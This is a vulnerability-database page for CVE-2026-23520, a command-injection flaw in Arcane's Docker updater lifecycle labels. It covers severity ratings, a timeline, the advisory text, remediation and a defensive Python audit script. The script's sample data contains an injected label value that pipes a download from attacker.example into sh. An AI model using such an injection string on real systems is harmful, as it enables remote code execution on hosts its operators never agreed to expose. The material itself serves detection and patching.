
Docker CVE-2026-23520

Severity: Critical, 9.0 (NVD); the rating is disputed between sources, see "Severity by source" below
Weakness: OS Command Injection (CWE-78)
Published: 2026-01-15 by security-advisories@github.com, advisory GHSA-gjqq-6r35-w3r8

Severity by source

Sources disagree (Low to Critical).

GitHub Advisory (primary): 9.0 CRITICAL
  CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H
SUSE: 3.1 LOW
  CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H (as displayed on the page; this vector is identical to the GitHub one and scores 9.0 under CVSS 3.1, so it does not explain SUSE's 3.1 rating and has likely been copied from the GitHub entry rather than taken from SUSE's own assessment)

vuln.today treats the vendor's rating as authoritative. A higher third-party CVSS (e.g. CISA-ADP) is shown for transparency but does not drive the headline severity.

CVSS vector (GitHub Advisory)

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low
User Interaction: Required
Scope: Changed
Confidentiality: High
Integrity: High
Availability: High

PR:L and UI:R match the description below: the attacker needs an ordinary authenticated account, and the injected command only runs when an administrator (or a scheduled check) triggers a container update.

Lifecycle timeline (4 events, oldest first; times as recorded by the named source)

Jan 15, 2026 20:16  CVE published (nvd)
Feb 05, 2026 21:37  PoC detected: public exploit code (vuln.today)
Mar 12, 2026 21:54  Analysis generated (vuln.today)
Mar 31, 2026 21:13  Patch released: patch available (nvd)

Description (GitHub Advisory)

Arcane provides modern Docker management. Prior to 1.13.0, Arcane has a command injection vulnerability in its updater service. The updater supported the lifecycle labels com.getarcaneapp.arcane.lifecycle.pre-update and com.getarcaneapp.arcane.lifecycle.post-update, which define a command to run before or after a container update. The label value is passed directly to /bin/sh -c without sanitization or validation. Because any authenticated user (not only administrators) can create projects through the API, an attacker can create a project that carries one of these lifecycle labels with a malicious command. When an administrator later triggers a container update (either manually or via scheduled update checks), Arcane reads the lifecycle label and executes its value as a shell command inside the container. This vulnerability is fixed in 1.13.0.

Analysis (AI-generated)

Arcane Docker management tool before 1.13.0 has command injection in lifecycle labels. Container labels are passed to /bin/sh -c without sanitization, enabling RCE. …


Attack chain (AI-derived)

Hypothetical attack flow derived from CVE metadata:

Access: an authenticated, non-administrator user creates a project via the API.
Exploit: the project's container definition sets a pre-update or post-update lifecycle label to a malicious command.
Execution: when an administrator or scheduled check triggers a container update, the updater service passes the label value to /bin/sh -c unchanged.
Impact: arbitrary shell command execution inside the updated container, per the advisory text; the advisory does not claim escape to the Docker host.

Vulnerability assessment (AI-generated)

Exploitation: an authenticated account is required (any role suffices); the Arcane updater service must be enabled with lifecycle label processing active; and an administrator, or a scheduled update check, must trigger a container update that invokes the pre-update or post-update hook. Additional conditions and limiting factors are described in the full assessment.
Risk assessment: CVSS 9.0 (Critical). …
Exploit scenario: the attacker sets a lifecycle label whose value is a reverse-shell command. When Arcane updates the container, the hook hands that value to /bin/sh -c and the injected command runs.
Remediation: update Arcane to 1.13.0 or later, the version the advisory names as fixed. Until the upgrade is in place, audit existing containers for the two lifecycle labels before triggering any update and remove values an administrator did not set. …
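The audit suggested above, as an added example (not Arcane's code and not the project's fix). It reads the JSON array that `docker inspect <id...>` prints, reports every container carrying either lifecycle label named in the description, and flags values containing shell metacharacters. Any value is a finding, since the unpatched updater runs it verbatim under /bin/sh -c; the flag only helps prioritise. The sample input is constructed, attacker.example is a placeholder, and the use of the com.docker.compose.project label to trace a finding back to its project assumes Arcane projects are deployed as Compose projects.

```python
"""Audit `docker inspect` output for Arcane lifecycle labels (CVE-2026-23520).

Added example, not Arcane's own code. Usage:
    docker inspect $(docker ps -aq) | python3 audit_lifecycle_labels.py
Run with no stdin to see the constructed sample below.
"""
import json
import re
import sys

LIFECYCLE_LABELS = (
    "com.getarcaneapp.arcane.lifecycle.pre-update",
    "com.getarcaneapp.arcane.lifecycle.post-update",
)

# Sequences that only matter once a string reaches `sh -c`: command
# separators, pipes, redirections, substitution, line breaks and escapes.
SHELL_METACHARS = re.compile(r"[;&|`$<>(){}\n\\]")


def audit_containers(inspect_json: str) -> list[dict]:
    """Return one finding per lifecycle label on any container, in input order."""
    findings = []
    for container in json.loads(inspect_json):
        config = container.get("Config") or {}
        labels = config.get("Labels") or {}          # Labels may be null
        name = container.get("Name", "").lstrip("/")  # inspect prefixes "/"
        for key in LIFECYCLE_LABELS:
            if key not in labels:
                continue
            value = labels[key]
            findings.append({
                "container": name,
                "label": key,
                "value": value,
                # True when the value can do more than run a single program.
                "shell_metachars": bool(SHELL_METACHARS.search(value)),
                # Assumption: Arcane projects are Compose projects, so this
                # label points at the project (and thus its creator).
                "project": labels.get("com.docker.compose.project"),
            })
    return findings


# Constructed sample: a benign hook, an injected hook, and a container
# with no labels at all.
SAMPLE_INSPECT = json.dumps([
    {"Name": "/web", "Config": {"Labels": {
        "com.docker.compose.project": "shop",
        "com.getarcaneapp.arcane.lifecycle.pre-update": "echo starting update",
    }}},
    {"Name": "/db", "Config": {"Labels": {
        "com.docker.compose.project": "intern-sandbox",
        "com.getarcaneapp.arcane.lifecycle.post-update":
            "true; curl -s http://attacker.example/p | sh",
    }}},
    {"Name": "/cache", "Config": {"Labels": None}},
])


def main() -> None:
    data = "" if sys.stdin.isatty() else sys.stdin.read()
    if not data.strip():
        data = SAMPLE_INSPECT
    for f in audit_containers(data):
        tag = "SUSPICIOUS" if f["shell_metachars"] else "REVIEW"
        print(f"{tag:10} {f['container']:<8} project={f['project']} "
              f"{f['label']} = {f['value']!r}")


if __name__ == "__main__":
    main()
```

Because the updater executes whatever the label holds, a "REVIEW" finding is still a finding: confirm with the project's owner that an administrator set the value before allowing an update to run.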

Recommended action (AI-generated)

Within 24 hours: identify every Arcane instance older than 1.13.0 and upgrade it to 1.13.0 or later, the version the advisory names as fixed. …

Vendor status

SUSE: severity Low


CVE-2026-23520 vulnerability details – vuln.today
